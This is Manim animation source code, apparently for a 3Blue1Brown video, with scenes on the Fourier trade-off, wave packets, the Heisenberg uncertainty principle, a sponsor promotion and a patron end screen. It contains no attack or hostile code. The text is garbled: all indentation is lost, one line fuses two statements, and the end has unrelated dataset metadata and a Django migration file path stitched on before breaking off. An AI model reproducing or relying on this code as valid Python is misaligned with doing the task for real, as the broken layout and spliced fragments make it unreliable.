def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
def get_peak_flash_anim(self, weight):
mobject = Mobject() mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
class MinutPhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
def get_wave_func(self):
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
answer = VGroup()
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2),
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
self.add()
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
print(self.num_plays)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
| true
| true
|
f707a4256c7b6a07fa804637aec60c40fb024bfa
| 383
|
py
|
Python
|
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
"MIT"
] | null | null | null |
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
"MIT"
] | null | null | null |
server/api/migrations/0005_auto_20180128_1006.py
|
MePsyDuck/OAPS
|
ddbc69fbd11d1a02d37514d48f5dabe04cd23405
|
[
